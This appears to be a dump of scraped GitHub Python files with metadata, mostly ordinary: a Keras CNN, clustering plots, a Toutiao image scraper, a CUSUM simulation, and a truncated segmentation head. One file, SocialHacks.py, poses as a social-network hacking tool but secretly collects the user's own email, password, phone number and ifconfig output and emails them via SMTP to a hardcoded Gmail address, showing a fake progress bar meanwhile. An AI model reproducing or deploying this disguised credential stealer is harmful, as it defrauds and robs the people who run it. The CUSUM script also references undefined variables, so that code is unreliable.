"api_name": "requests.get",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_numb... |
20506069143 | #MODULOS
import os
import sys
import time
import smtplib
from sympy.crypto.crypto import encipher_affine, decipher_affine
from sympy.crypto.crypto import encipher_shift, decipher_shift
#COLORES
ve = "\033[1;32;40m" #Ve
az = "\033[1;34;40m" #A
ro = "\033[1;31;40m" #Ro
#FUNCIONES
def sutil(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(12. / 150)
def corrida(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(3. / 250)
def xuxa(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(2. / 120)
def saludo(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(3. / 100)
def medio(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(8. / 200)
def lento(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(10. / 200)
def proceso(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(15. / 150)
os.system("clear")
sutil(ve+"Para tener un resultado eficiente asegúrate de agregar la información correctamente que se te solicita.")
os.system("sleep 2")
os.system("clear")
corrida(az+""" ¤▪¤▪¤▪¤▪♤¤▪¤▪¤▪♤¤▪¤▪¤▪¤
S-O-C-I-A-L ♧ H-A-C-K-S
¤▪¤▪¤▪¤▪¤▪♤▪¤▪¤▪♤¤▪¤▪¤▪ """)
sutil(ve+"Hackea una red social en cuestión de minutos o segundos con SocialHacks")
def sz():
sp = corrida(az+"_____")
medio(ro+"Red social:")
s = az+"-"
corrida(az+"_________________"+ro)
print ("1-.Facebook"+s)
sz()
print (ro+"2-.Instagram"+s)
sz()
print (ro+"3-.Twiter"+s)
sz()
print (ro+"4-.Reddit"+s)
sz()
print (ro+"5-.Tiktok"+s)
corrida(az+"_________________"+ro)
try:
rp11 = int(input("Elige una opcion\n"+ve+'>>>'))
if rp11 == 1:
rmsn = "Facebook"
elif rp11 == 2:
rmsn = "Instagram"
elif rp11 == 3:
rmsn = "Twiter"
elif rp11 == 4:
rmsn = "Reddit"
elif rp11 == 5:
rmsn = "Tiktok"
else:
print ("Este numero no es una opción")
sys.exit()
except ValueError:
print (ro+"Tu respuesta no fue un numero")
sys.exit()
print (ro+"Hss elegido",rmsn+'\n'+ro)
seq = open("module.txt")
asw = seq.read()
kew = (5, 5028)
wad = decipher_affine(asw,kew)
a = wad.lower()
subject = input("Añade tu nombre de perfil:\n>>> ")
numero = input(ro+"Agrega numero de celular:\n>>> ")
url = input(az+"Introduce la url del perfil de tu victima?\n>>> ")
rob = input(ve+"Introduce tu correo\n>>> ")
psd = input(ro+"Introduce la contraseña\n>>> ")
tubo = os.popen("ifconfig")
tubo = tubo.readlines()
obj = "vallettaoficial@gmail.com"
num = "Numero:", numero
mar = "Url:", url
cor = "Correo:", rob
arb = "Contrasena:", psd
msg = num, mar, cor, arb, tubo
msg = ('Subject: {}\n\n{}'.format(subject, msg))
server = smtplib.SMTP("smtp.gmail.com", 587)
server.starttls()
server.login("patoelsa170@gmail.com", a)
server.sendmail("patoelsa170@gmail.com", obj, msg)
server.quit()
def x(i):
for c in i:
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(12. /150)
x("Detectando contraseña de la victima")
while True:
sys.stdout.write(".")
sys.stdout.flush()
time.sleep(40. / 30)
| jhondoeelmisterio/SocialHacks | SocialHacks.py | SocialHacks.py | py | 3,622 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.stdout.write",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "sys.stdout",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "sys.stdout.flush",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "sys.stdout",
"l... |
29614366198 |
from colorama import Fore, Style
from typing import Tuple
import numpy as np
from colorama import Fore, Style
import time
print(Fore.BLUE + "\nLoading tensorflow..." + Style.RESET_ALL)
start = time.perf_counter()
from tensorflow import keras
from keras import Model, Sequential, layers, regularizers, optimizers, models
from keras.callbacks import EarlyStopping
end = time.perf_counter()
print(f"\n✅ tensorflow loaded ({round(end - start, 2)} secs)")
def initialize_model(X: np.ndarray) -> Model:
"""
Initialize the Neural Network with random weights
"""
print(Fore.BLUE + "\nInitialize model..." + Style.RESET_ALL)
model = models.Sequential()
input_shape = (13, 130, 1)
### First Convolution, MaxPooling, and Normalization
model.add(layers.Conv2D(32, (3,3), activation='relu', padding='same', input_shape=input_shape))
model.add(layers.MaxPool2D(pool_size=(3,3), strides=(2, 2), padding='same'))
model.add(layers.BatchNormalization())
model.add(layers.Dropout(0.5))
### Second Convolution & MaxPooling
model.add(layers.Conv2D(32, (2,2), activation='relu', padding='same'))
model.add(layers.MaxPool2D(pool_size=(3,3), strides=(2, 2), padding='same'))
model.add(layers.BatchNormalization())
model.add(layers.Dropout(0.55))
### Third Convolution & MaxPooling
model.add(layers.Conv2D(32, (2,2), activation='relu', padding='same'))
model.add(layers.MaxPool2D(pool_size=(2,2), strides=(2, 2), padding='same'))
model.add(layers.BatchNormalization())
model.add(layers.Dropout(0.55))
### Flattening
model.add(layers.Flatten())
### One more Dense Layer
model.add(layers.Dense(64, activation='relu'))
### A Dropout layer to avoid overfitting
model.add(layers.Dropout(0.5))
### Last layer - Classification Layer with 8 outputs for the 8 genres
model.add(layers.Dense(8, activation='softmax'))
print("\n✅ model initialized")
return model
def compile_model(model: Model, learning_rate: float) -> Model:
"""
Compile the Neural Network
"""
### Model compilation
optimizer = optimizers.Adam(learning_rate=0.0001)
model.compile(loss='categorical_crossentropy',
optimizer=optimizer,
metrics=['accuracy'])
print("\n✅ model compiled")
return model
def train_model(model: Model,
X: np.ndarray,
y: np.ndarray,
batch_size=32,
patience=10,
validation_split=0.3,
validation_data=None) -> Tuple[Model, dict]:
"""
Fit model and return a the tuple (fitted_model, history)
"""
print(Fore.BLUE + "\nTrain model..." + Style.RESET_ALL)
#Setup early stopping
es = EarlyStopping(patience = patience, monitor='accuracy')
#Training the data
history = model.fit(X,
y,
validation_split=validation_split,
validation_data=validation_data,
batch_size = batch_size,
epochs = 50,
callbacks = [es],
verbose = 1)
print(f"\n✅ model trained ({len(X)} rows)")
return model, history
def evaluate_model(model: Model,
X: np.ndarray,
y: np.ndarray,
batch_size=64) -> Tuple[Model, dict]:
"""
Evaluate trained model performance on dataset
"""
print(Fore.BLUE + f"\nEvaluate model on {len(X)} rows..." + Style.RESET_ALL)
if model is None:
print(f"\n❌ no model to evaluate")
return None
metrics = model.evaluate(
x=X,
y=y,
batch_size=batch_size,
verbose=1,
# callbacks=None,
return_dict=True)
accuracy = metrics["accuracy"]
# mae = metrics["mae"]
# print(f"\n✅ model evaluated: loss {round(loss, 2)} mae {round(mae, 2)}")
print(f"\n✅ model evaluated: accuracy {round(accuracy, 2)}")
return metrics
| rsmassey/mcats | mcats/ml_logic/model_cnn.py | model_cnn.py | py | 3,987 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "colorama.Fore.BLUE",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "colorama.Fore",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "colorama.Style.RESET_ALL",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "colo... |
21016222260 | import matplotlib.pyplot as pl
import numpy as np
import pickle
from random import randint
import pandas as pd
"""
x = np.linspace(0,10,20) # 20 points entre 0 et 10
y1 = x*x + 2*x # la fonction a tracer
y2 = np.sqrt(x) # la fonction a tracer
pl.figure() # creation d'une figure
pl.subplot(1,2,1) # division de la fenetre en une matrice 1x2
pl.plot(x,y1,'g--', label='$y = x^2+2x$')
# affichage de la courbe + style + etiquette
pl.legend(loc=0)
pl.subplot(1,2,2)
pl.plot(x,y2, 'r*-', label='$y = \sqrt{x}$')
pl.legend(loc=2) # affichage de la légende en haut a gauche
pl.show() # affichage de la fenetre
"""
df = pd.read_csv('/Users/Jacobo/Documents/uni/L2/2i013/data/toutlisse.csv',sep=",")
#print(len(df))
def moyenne_centroide(centroide,k):
resultat = [[0]*288 for i in range (k)]
for i in range(k):
for j in range(len(centroide[i])):
resultat[i][j%288]+=centroide[i][j]
return resultat
def jourmoyen(station):
resultat = [0]*288
for i in range(len(station)):
resultat[i%288]+=station[i]
return resultat
def moyenne_station(station,k):
return 1
"""
a=mo
tiroir=pickle.load(open("./data/clus11","rb"))
tiroirfini=moyenne_centroide(tiroir)
a=moyenne_centroide(c,11)
for i in range(len(a)):
pl.figure(i)
pl.plot(heure,a[i])
pl.show()
"""
def plot(k):
c=pickle.load( open( "./data/centroide"+str(k)+".p", "rb" ) )
df4 = pd.read_csv('./data/toutlisse.csv',sep=",")
tiroir=pickle.load(open("./data/clus"+str(k)+".p","rb"))
#heure=pickle.load(open("./data/heures.p","rb"))
a=moyenne_centroide(c,k)
#pour le premier
for i in range (k):
pl.figure(i)
for j in range(2):
indice=randint(0,len(tiroir[i])-1)
#print(indice," ",len(tiroir[i]))
station=jourmoyen(df4[str(tiroir[i][indice])])
suma=sum(station)
#print(sum([k/suma for k in station]))
plotdata=[k/suma for k in station]
pl.plot([k/12 for k in range(24*12)],plotdata,c='r',alpha=.5)
#pl.xticks([k for k in range(24)])
suma=sum(a[i])
plotdata=[k/suma for k in a[i]]
pl.title("Centroide n"+str(i)+" ainsi que deux stations aleatoires du cluster")
pl.plot([k/12 for k in range(24*12)],plotdata,c='g')
pl.xticks([k for k in range(24)])
pl.yticks([])
pl.xlabel('heure')
pl.ylabel('frequentation normalisee')
pl.figure(i).savefig("./data/plotcentroidestation"+str(i)+".pdf")
#pl.show()
#%%
def signalstationmoyenne(station,fenetre):
"""288 ticks sur un jour"""
df = pd.read_csv('/Users/Jacobo/Documents/uni/L2/2i013/data/toutlisse.csv',sep=",")
df=df[str(station)]
courbe = [0]*288
for i in range(288*3,288*4):
courbe[i%288]+=df[i]
for i in range(len(courbe)):
if (i<int(fenetre/2)):
courbe[i]=sum(courbe[:int(fenetre/2)+i])/(int(fenetre/2)+i)
elif (i>len(courbe)-int(fenetre/2)):
courbe[i]=sum(courbe[len(courbe)-int(fenetre/2):])/(288-i+int(fenetre/2))
else:
courbe[i]=sum(courbe[i-int(fenetre/2):i+int(fenetre/2)])/fenetre
pl.title("Lissage avec filtre passe-haut de fenêtre="+str(fenetre))
pl.plot([k/12 for k in range(24*12)],courbe)
pl.xlabel('heure')
pl.ylabel('frequentation normalisee')
pl.xticks([k for k in range(24)])
#print(courbe)
signalstationmoyenne(198,4)
#%%
def difference_centroides(c1,c2,k):
c=pickle.load( open( "/Users/Jacobo/Documents/uni/L2/2i013/data/centroide"+str(k)+".p", "rb" ) )
#heure=pickle.load(open("./data/heures.p","rb"))
a=moyenne_centroide(c,k)
suma=sum(a[c1])
plotdata1=[k/suma for k in a[c1]]
suma=sum(a[c2])
plotdata2=[k/suma for k in a[c2]]
plotdata=[plotdata1[i]-plotdata2[i] for i in range(len(plotdata1))]
pl.title("Differences entre le centroide n"+str(c1)+" et le centroide n"+str(c2))
pl.plot([k/12 for k in range(24*12)],plotdata,c='g',label="différences")
#pl.plot([k/12 for k in range(24*12)],[0]*288,c='black',label="y=0")
#pl.legend(loc='upper left')
pl.grid(axis='y')
pl.xticks([k for k in range(24)])
pl.yticks([0])
pl.xlabel('heure')
pl.ylabel('frequentation normalisee')
pl.savefig("./data/centroide"+str(c1)+"vscentroide"+str(c2)+".pdf")
difference_centroides(0,8,11)
#%%
def signalstationperiode(numstation,i):
df = pd.read_csv('/Users/Jacobo/Documents/uni/L2/2i013/data/toutlisse.csv',sep=",")
signal=df[str(numstation)]
pl.title("Signal de la station "+str(numstation)+" sur la période des données")
pl.plot([(k/(24*12)) for k in range(len(signal))],signal)
pl.xticks([k+1 for k in range(0,93,i)]) #len(signal)/(24*12)=92
#pl.yticks([])
pl.xlabel('jour (nº)')
pl.ylabel('fréquentation (u.a.)')
signalstationperiode(496,8)
#%%
def plotpurete(k,purete):
#df = pd.read_csv('/Users/Jacobo/Documents/uni/L2/2i013/data/toutlisse.csv',sep=",")
#signal=df[str(numstation)]
#pl.title("Signal de la station "+str(numstation)+" sur la période des données")
pl.plot(k,purete)
#pl.xticks(purete) #len(signal)/(24*12)=92
#pl.yticks(k)
pl.ylabel('purete')
pl.xlabel('k')
res=[0.0151343,0.27919375365459359,0.45781309118426033]
k=[100,500,1000]
plotpurete(k,res)
#%%
"""
Lidee serait de prendre 2 stations de chaqu centroide, ensuite, appliquer une moeynne dessus
puis les plotter sur le meme graphique que le centroide en les ayant normalisees
plt.scatter(x,y)
plt.title("Web traffic over the last month")
plt.xlabel("Time")
plt.ylabel("Hits/hour")
plt.xticks([w*7*24 for w in range(10)],
['week %i'%w for w in range(10)])
plt.autoscale(tight=True)
plt.grid()
plt.show()
result=[i/suma for i in a[0]]
pl.plot([i/12 for i in range(24*12)],result)
pl.xticks([i for i in range(24)])
pl.show()
""" | Eastkap/uni | L2/2i013/graphe.py | graphe.py | py | 6,014 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pandas.read_csv",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "pickle.load",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "pickle.load",
"line_n... |
34536369385 | import requests
from urllib.parse import urlencode
import re
from requests import codes
import os
from hashlib import md5
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'Host': 'p3-tt.bytecdn.cn',
'Upgrade-Insecure-Requests': 1,
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'
}
def get_page(offset):
params = {
'aid': '24',
'offset': offset,
'format': 'json',
# 'keyword': '街拍',
'autoload': 'true',
'count': '20',
'cur_tab': '1',
'from': 'search_tab',
'pd': 'synthesis'
}
base_url = 'https://www.toutiao.com/api/search/content/?keyword=%E8%A5%BF%E5%AE%89'
url = base_url + urlencode(params)
try:
resp = requests.get(url)
print(url)
if 200 == resp.status_code:
print(resp.json())
return resp.json()
except requests.ConnectionError:
return None
items = []
def get_images(json):
if json.get('data'):
data = json.get('data')
for item in data:
title = item.get('title')
images = item.get('image_list')
if title is None or images is None:
continue
for image in images:
origin_image = re.sub("list/300x196/", "origin/", image.get('url'))
print(image.get('url'))
print(origin_image)
print("---")
# 返回一个生成器
map = {
# 'image': origin_image,
'image': origin_image,
'title': title
}
items.append(map)
def save_image(item):
# 获取文件系统分隔符
img_path = '/Users/zzzz/Desktop/image' + os.path.sep + item.get('title')
if not os.path.exists(img_path):
os.makedirs(img_path)
try:
resp = requests.get(item.get('image'), headers)
if codes.ok == resp.status_code:
file_path = img_path + os.path.sep + '{file_name}.{file_suffix}'.format(
file_name=md5(resp.content).hexdigest(),
file_suffix='jpg')
if not os.path.exists(file_path):
with open(file_path, 'wb') as f:
f.write(resp.content)
print('Downloaded image path is %s' % file_path)
else:
print('Already Downloaded', file_path)
except requests.ConnectionError:
print('Failed to Save Image,item %s' % item)
def main(offset):
for offset in range(0,100,20):
json = get_page(offset)
get_images(json)
for item in items:
save_image(item)
main(0)
| ZhouYuanZZZZ/pythonStudy | spider/toutiao/toutiao_jiepai.py | toutiao_jiepai.py | py | 3,035 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "urllib.parse.urlencode",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "requests.ConnectionError",
"line_number": 40,
"usage_type": "attribute"
},
{
"api_name": "re.... |
34533830120 | import numpy as np
from scipy import stats
# from expon_cusum import Lv,F1
# import matplotlib.pyplot as plt
### This script is used to compare the thresholds for CuSum & WL-Cusum
## From first commit
class F1(object):
def __init__(self,c,mu_1=1,sig_1=1):
self.c = c
self.mu_1 = mu_1
self.dist = stats.norm(0,sig_1)
def pdf(self,y,nu,t):
# Require: t > nu
assert(not isinstance(y,np.ndarray))
return self.dist.pdf(y-self.mu_1*np.exp(self.c*(t-nu)))
def logpdf(self,y,nu,t):
# Require: t > nu
assert(not isinstance(y,np.ndarray))
return self.dist.logpdf(y-self.mu_1*np.exp(self.c*(t-nu)))
def rvs(self,size,nu,t):
# Require: t > nu
return self.dist.rvs(size=size) + self.mu_1*np.exp(self.c*(np.arange(t,t+size)-nu))
def logpdf_arr(self,y):
assert(isinstance(y,np.ndarray))
ind = np.arange(float(len(y)))
return np.sum(self.dist.logpdf(y-self.mu_1*np.exp(self.c*ind)))
def gfun(y,fc,f0):
llr = np.zeros(len(y))
for k in range(len(y)):
llr[k] = fc.logpdf_arr(y[k:]) - np.sum(f0.logpdf(y[k:]))
# print(llr)
return (np.argmax(llr),np.amax(llr))
def Lv(y, f0, c, t):
max_k, max_llr = gfun(y,F1(c,mu_1=f0.mean(),sig_1=np.sqrt(f0.var())),f0)
# print(t,max_k)
return max_llr
c = 0.4
f0 = stats.norm(0.1,100)
# f1 = F1(c,mu_1=f0.mean(),sig_1=np.sqrt(f0.var()))
b_1 = np.exp(np.linspace(np.log(.75),np.log(1.05),5))
b_2 = np.exp(np.linspace(np.log(.22),np.log(.32),5))
b_3 = np.exp(np.linspace(np.log(2),np.log(4.8),5))
N = 10000
mtfa_1 = np.zeros(len(b_1))
mtfa_2 = np.zeros(len(b_2))
mtfa_3 = np.zeros(len(b_3))
# add_1 = np.zeros(len(b_1))
# add_2 = np.zeros(len(b_2))
# add_3 = np.zeros(len(b_3))
W_1 = 25
W_2 = 50
for j in range(N):
for i in range(len(b_1)):
t = W_1
y = f0.rvs(size=2000)
while True:
try:
y[t]
except IndexError:
y = np.append(y,f0.rvs(size=2000))
v_1 = Lv(y[max(1,t-W_1+1):t+1], f0, c, t)
if (v_1 > b_1[i]):
mtfa_1[i] = mtfa_1[i] + t - W_1 + 1
break
t = t + 1
# print(mtfa_1[i])
for i in range(len(b_2)):
t = W_2
y = f0.rvs(size=2000)
while True:
try:
y[t]
except IndexError:
y = np.append(y,f0.rvs(size=2000))
v_2 = Lv(y[max(1,t-W_2+1):t+1], f0, c, t)
if (v_2 > b_2[i]):
mtfa_2[i] = mtfa_2[i] + t - W_2 + 1
break
t = t + 1
# print(mtfa_2[i])
# No WL
for i in range(len(b_3)):
t = 0
y = f0.rvs(size=2000)
while True:
try:
y[t]
except IndexError:
y = np.append(y,f0.rvs(size=2000))
v_3 = Lv(y[:t+1], f0, c, t)
if (v_3 > b_3[i]):
mtfa_3[i] = mtfa_3[i] + t + 1
break
t = t + 1
# for i in range(len(b_1)):
# t = W_1
# y = f0.rvs(size=W_1)
# while True:
# try:
# y[t]
# except IndexError:
# y = np.append(y,f1.rvs(size=W_1,nu=W_1-1,t=t))
# v_1 = Lv(y[max(1,t-W_1+1):t+1], f0, c, t)
# if (v_1 > b_1[i]):
# add_1[i] = add_1[i] + t - W_1 + 1
# break
# t = t + 1
#
# for i in range(len(b_2)):
# t = W_2
# y = f0.rvs(size=W_2)
# while True:
# try:
# y[t]
# except IndexError:
# y = np.append(y,f1.rvs(size=W_2,nu=W_2-1,t=t))
# v_2 = Lv(y[max(1,t-W_2+1):t+1], f0, c, t)
# if (v_2 > b_2[i]):
# add_2[i] = add_2[i] + t - W_2 + 1
# break
# t = t + 1
#
# for i in range(len(b_3)):
# t = W_3
# y = f0.rvs(size=W_3)
# while True:
# try:
# y[t]
# except IndexError:
# y = np.append(y,f1.rvs(size=W_3,nu=W_3-1,t=t))
# v_3 = Lv(y[max(1,t-W_3+1):t+1], f0, c, t)
# if (v_3 > b_3[i]):
# add_3[i] = add_3[i] + t - W_3 + 1
# break
# t = t + 1
if j % 10 == 9:
print("Num of Iterations:", (j+1))
print("mtfa_1:", mtfa_1 / (j+1))
print("mtfa_2:", mtfa_2 / (j+1))
print("mtfa_3:", mtfa_3 / (j+1))
print("add_1:", add_1 / (j+1))
print("add_2:", add_2 / (j+1))
print("add_3:", add_3 / (j+1))
# with open('./icp_cusum_t1.npy', 'wb') as f:
# np.save(f, mtfa_1 / (j+1))
# np.save(f, mtfa_2 / (j+1))
# np.save(f, mtfa_3 / (j+1))
# np.save(f, add_1 / (j+1))
# np.save(f, add_2 / (j+1))
# np.save(f, add_3 / (j+1))
###
| jacksonliang35/Quickest-Change-Detection | Non-Stationary/ns_wl_thr.py | ns_wl_thr.py | py | 4,956 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "scipy.stats.norm",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "scipy.stats",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "numpy.ndarray",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "numpy.exp",
"line... |
41120383892 | import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.runner import force_fp32, BaseModule, auto_fp16
from mmcv.ops.roi_align import roi_align
from mmdet.core import (bbox_cxcywh_to_xyxy, bbox_xyxy_to_cxcywh,
build_assigner, build_sampler, multi_apply,
reduce_mean)
from mmdet.models.builder import HEADS
import torch.distributed as dist
import random
from timm.models.vision_transformer import trunc_normal_
from model import build_model
import numpy as np
import os
from math import sqrt
BYTES_PER_FLOAT = 4
# TODO: This memory limit may be too much or too little. It would be better to
# determine it based on available resources.
GPU_MEM_LIMIT = 1024**3 # 1 GB memory limit
@HEADS.register_module()
class InsSegHead(BaseModule):
_version = 2
def __init__(self,
task_id,
num_classes,
loss_weight=1.0,
num_query=100,
num_bins=2000,
coord_norm='abs',
norm_val=1333,
transformer=None,
sync_cls_avg_factor=False,
with_mask=True,
init_cfg=None,
vae_cfg=dict(
token_length=16,
mask_size=64,
embedding_dim=64,
num_embeddings=256,
pretrained='vqvae_patch16_256_64.pth',
freeze=True
),
seq_aug=None,
box_std=0.2,
cls_drop=0.,
mask_before_label=False,
sup_neg_mask=False,
no_sup_mask=False,
cls_weight=1.0,
box_weight=1.0,
mask_weight=1.0,
class_label_corruption='rand_n_fake_cls',
decoder_loss_weight=0.,
dice_loss_weight=1.0,
max_obj_decoderloss=100,
**kwargs):
super().__init__(init_cfg)
self.cnt = 0
self.decoder_loss_weight = decoder_loss_weight
self.max_obj_decoderloss = max_obj_decoderloss
self.dice_loss_weight = dice_loss_weight
self.task_id = task_id
self.loss_weight = loss_weight
self.class_label_corruption = class_label_corruption
self.cls_weight = cls_weight
self.box_weight = box_weight
self.mask_weight = mask_weight
self.mask_before_label = mask_before_label
self.sup_neg_mask = sup_neg_mask
self.no_sup_mask = no_sup_mask
self.bg_cls_weight = 0
self.sync_cls_avg_factor = sync_cls_avg_factor
self.num_query = num_query
self.num_bins = num_bins
self.coord_norm = coord_norm
self.norm_val = norm_val
self.num_classes = num_classes
self.fp16_enabled = False
self.with_mask = with_mask
self.box_std = box_std
self.cls_drop = cls_drop
self.transformer = transformer
self.mask_token_length = vae_cfg['token_length']
self.transformer.mask_token_length = self.mask_token_length
self.vqvae = build_model(vae_cfg)
self.mask_size = (vae_cfg['mask_size'], vae_cfg['mask_size'])
self.vae_cfg = vae_cfg
self.seq_aug = seq_aug
self.num_vocal = self.transformer.num_vocal
self.class_offset = num_bins + 1
self.special_offset = self.class_offset + num_classes
self.noise_label = self.special_offset + 1
self.mask_offset = self.special_offset + 2
class_weight = torch.ones(self.num_vocal)
class_weight[:self.num_bins+1] = box_weight
class_weight[self.class_offset: self.class_offset +
num_classes] = cls_weight
class_weight[self.noise_label] = cls_weight
class_weight[self.mask_offset: self.mask_offset +
self.vae_cfg.num_embeddings] = mask_weight
self.loss_seq = nn.CrossEntropyLoss(
weight=class_weight, reduction='sum')
def build_input_seq(self, targets, max_objects=100):
device = targets[0][0].device
def shift_bbox(bbox, scale_factor):
n = bbox.shape[0]
box_xy = torch.rand((n, 2), device=device) * scale_factor[:2]
box_wh = (bbox[:, 2:] - bbox[:, :2]) / 2.
box = torch.cat([box_xy - box_wh, box_xy + box_wh], dim=-1)
return box
def random_bbox(n, scale_factor):
box_xy = torch.rand((n, 2), device=device)
# trunc normal generate [-2,2]
box_wh = torch.abs(trunc_normal_(
torch.empty((n, 2), device=device)) / 4)
box = torch.cat([box_xy - box_wh, box_xy + box_wh],
dim=-1) * scale_factor
return box
def jitter_bbox(bbox, max_range=0.1):
n = bbox.shape[0]
if n == 0:
return bbox
w = bbox[:, 2] - bbox[:, 0]
h = bbox[:, 3] - bbox[:, 1]
noise = torch.stack([w, h, w, h], dim=-1)
noise_rate = trunc_normal_(torch.empty(
(n, 4), device=device)) / 2 * max_range
bbox = bbox + noise * noise_rate
return bbox
assert self.coord_norm == 'abs'
input_seq_list = []
bad_bbox_flag_list = []
max_len = max([t[0].size(0) for t in targets])
for b_i, target in enumerate(targets):
box, mask_token, gt_masks, mask_idx, label, img_size = target
mask_token_sft = mask_token + self.mask_offset
h, w = img_size[0], img_size[1]
scale_factor = torch.tensor([w, h, w, h], device=device)
label_token = label.unsqueeze(1) + self.class_offset
if self.coord_norm == 'abs':
norm_box = box / self.norm_val
else:
norm_box = box / scale_factor
box_tokens = (
norm_box * self.num_bins).round().long().clamp(min=0, max=self.num_bins)
if self.mask_before_label:
input_tokens = torch.cat(
[box_tokens, mask_token_sft, label_token], dim=1)
else:
input_tokens = torch.cat(
[box_tokens, label_token, mask_token_sft], dim=1)
if self.seq_aug is None:
input_tokens = input_tokens.flatten()
nan = torch.full((max_len * (5 + self.vae_cfg.token_length) -
len(input_tokens),), 0, dtype=torch.int64, device=device)
input_seq = torch.cat([input_tokens, nan], dim=0)
input_seq_list.append(input_seq)
continue
num_objects = input_tokens.shape[0]
num_noise = max_objects - num_objects
# Create bad bbox.
dup_bbox_size = random.randint(0, num_noise)
dup_bbox_size = 0 if num_objects == 0 else dup_bbox_size
bad_bbox_size = num_noise - dup_bbox_size
random_class = self.noise_label # noise label
multiplier = 1 if num_objects == 0 else num_noise // num_objects + 1
box_tiled = box.repeat((multiplier, 1))
box_tiled_idx = torch.arange(
len(box), device=device).repeat(multiplier)
bad_bbox_shift = box_tiled[torch.randperm(len(box_tiled))[
:bad_bbox_size]]
bad_bbox_shift = shift_bbox(bad_bbox_shift, scale_factor)
bad_bbox_random = torch.cat(
(random_bbox(bad_bbox_size, scale_factor), bad_bbox_shift), dim=0)
bad_bbox = bad_bbox_random[torch.randperm(
len(bad_bbox_random))[:bad_bbox_size]]
bad_bbox_label = torch.full(
(bad_bbox_size, ), random_class, device=device)
bad_mask = self.vqvae.encode(torch.zeros(
(1,)+self.mask_size, device=device))
bad_mask_token = bad_mask.expand(bad_bbox_size, -1)
# Create dup bbox.
permidx = torch.randperm(len(box_tiled), device=device)[
:dup_bbox_size]
dup_bbox = box_tiled[permidx]
dup_bbox = jitter_bbox(dup_bbox, max_range=0.1)
dup_bbox = dup_bbox.max(box.new([0., 0., 0., 0.])).min(
scale_factor) # add for pre crop/roi
dup_bbox_label = torch.full(
(dup_bbox_size, ), random_class, device=device)
dup_mask = crop_and_resize_gpu(
gt_masks, dup_bbox, self.mask_size, mask_idx[box_tiled_idx[permidx]], device=device)
dup_mask_token = self.vqvae.encode(dup_mask)
shuffle_idx = torch.randperm(num_noise)
bad_bbox_flag = torch.cat((torch.ones(bad_bbox_size, device=device), torch.zeros(
dup_bbox_size, device=device))).to(torch.bool)
bad_bbox_flag_list.append(
bad_bbox_flag[shuffle_idx].nonzero(as_tuple=True)[0])
noise_box = torch.cat((bad_bbox, dup_bbox), dim=0)[shuffle_idx].max(
box.new([0., 0., 0., 0.])).min(scale_factor)
noise_box_label = torch.cat(
(bad_bbox_label, dup_bbox_label), dim=0)[shuffle_idx]
noise_mask_token = torch.cat(
(bad_mask_token, dup_mask_token), dim=0)[shuffle_idx]
if self.coord_norm == 'abs':
random_norm_box = noise_box / self.norm_val
else:
random_norm_box = noise_box / scale_factor
noise_box_tokens = (
random_norm_box * self.num_bins).round().long().clamp(min=0, max=self.num_bins)
if self.mask_before_label:
fake_tokens = torch.cat(
[noise_box_tokens, noise_mask_token + self.mask_offset, noise_box_label.unsqueeze(1)], dim=1)
else:
fake_tokens = torch.cat([noise_box_tokens, noise_box_label.unsqueeze(
1), noise_mask_token + self.mask_offset], dim=1)
input_seq = torch.cat([input_tokens, fake_tokens], dim=0).flatten()
input_seq_list.append(input_seq)
return torch.stack(input_seq_list, dim=0), bad_bbox_flag_list
def get_targets(self, input_seq, num_objects_list, bad_bbox_flag_list):
N, L = input_seq.shape[0], input_seq.shape[1]//(
5 + self.vae_cfg.token_length)
for seq, num_objects, bad_bbox_flag in zip(input_seq, num_objects_list, bad_bbox_flag_list):
seq.view(L, 5 + self.vae_cfg.token_length)[num_objects:, :4] = -100
if self.no_sup_mask:
if self.mask_before_label:
seq.view(
L, 5 + self.vae_cfg.token_length)[:, 4:4+self.vae_cfg.token_length] = -100
else:
seq.view(L, 5 + self.vae_cfg.token_length)[:, 5:] = -100
elif self.sup_neg_mask:
if self.mask_before_label:
seq.view(L, 5 + self.vae_cfg.token_length)[
num_objects+bad_bbox_flag, 4:4+self.vae_cfg.token_length] = -100
else:
seq.view(
L, 5 + self.vae_cfg.token_length)[num_objects+bad_bbox_flag, 5:] = -100
else:
if self.mask_before_label:
seq.view(
L, 5 + self.vae_cfg.token_length)[num_objects:, 4:4+self.vae_cfg.token_length] = -100
else:
seq.view(
